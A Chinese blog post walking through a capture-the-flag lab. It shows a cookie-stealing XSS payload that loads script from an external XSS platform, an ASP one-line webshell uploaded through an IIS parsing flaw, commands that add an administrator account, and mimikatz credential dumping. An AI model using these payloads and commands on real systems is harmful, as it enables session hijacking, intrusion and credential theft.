尤里的复仇Ⅰ 小芳!

第三章:为了更多的权限!留言板!

判断是否为xss跨站脚本攻击

<script>alert(111)</script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

查看cookie

<script>alert(document.cookie)</script>

在这里插入图片描述
在这里插入图片描述

利用xss平台

https://xsshs.cn/xss.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

</tExtArEa>'"><sCRiPt sRC=//xsshs.cn/wJ2c></sCrIpT>

cookie : ASPSESSIONIDACABBAST=MFGFLEMALAOALAPDMNHBAEBA; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
在这里插入图片描述

flag就在cookie里面

zkz{xsser-g00d}

第四章:进阶!拿到Web最高权限!

修改为管理员cookie后请直接访问管理页面 准备好了吗?

F12修改cookie,修改为前面第三章拿到的cookie,ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
在这里插入图片描述
刷新后点击你准备好了吗进入后台在这里插入图片描述

上传木马

在这里插入图片描述

一句话木马:

<%eval request("666")%>

木马一般会被拦截,做成图片,可以使用copy命令合并木马文件,图片文件要小,最好用表情包,要不然会出现错误
在这里插入图片描述
查看图片文件中的木马:
在这里插入图片描述

存在IIS解析漏洞:改666.png为666.cer
在这里插入图片描述

拿权限

上传后用菜刀连接:

http://59.63.200.79:8005/UploadFiles/2021822221757997.cer

在这里插入图片描述

在这里插入图片描述
进入目录,查找flag:
在这里插入图片描述

flag为zkz{G3t_the_admin!Sh3ll}

第五章:SYSTEM!POWER!

尝试是否有权限

通过上一章,上传的shell,使用菜刀连接
直接访问C盘下的flag,没有权限。使用虚拟终端,权限还是不足
在这里插入图片描述

拿权限

右键点击cmd.exe,打开虚拟终端

输入whoami在这里插入图片描述
输入net user查看当前用户在这里插入图片描述
查看用户信息在这里插入图片描述
尝试创建用户,还是权限不足,这是因为cmd需要用到外部接口wscript.shell。但是wscript.shell仍然在C盘,C盘我们仍然无法访问。使用已经组装好的wscript.shell,也就是iis6.exe
输入iis6.exe “whoami”在这里插入图片描述
输入iis6.exe "net user zkaq 123456 /add"添加用户在这里插入图片描述
查看用户:net user在这里插入图片描述
将用户添加到管理员组中,赋予管理员权限。在这里插入图片描述
成功在这里插入图片描述

远程连接

win+R输入mstsc回车连接
在这里插入图片描述
输入刚刚创建的用户和密码在这里插入图片描述
到C盘拿Flag:zkz{F3ck_power_3y3stem}
在这里插入图片描述

第六章:GET THE PASS!

继续上一章的远程桌面连接,在C盘下找到这两个文件

在这里插入图片描述
但是无权限打开。右键属性-安全。进行权限设置。

在这里插入图片描述在这里插入图片描述

压缩包需要密码,文本里提示
在这里插入图片描述

这里需要用到工具

下载mimikatz并用菜刀上传mimikatz至服务器。注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

命令:privilege::debuug ----提升权限
sekurlsa::logonPasswords----获取登陆用户密码

1.运行主程序:mimikatz.exe;
2.输入:privilege::debug;(提升权限,成功显示:Privilege ‘20’ OK)
3.输入:sekurlsa::logonPasswords,然后找到对应用户和密码。( * HTLM后即为密码)
4.复制HTLM后内容到CMD5解密即得管理员administrator密码!(CMD5官网:https://cmd5.com/) 或用其他方法直接得到明文密码(及password后)

flag

在这里插入图片描述

posted @ 2022-10-12 21:30  sparename  阅读(39)  评论(0)    收藏  举报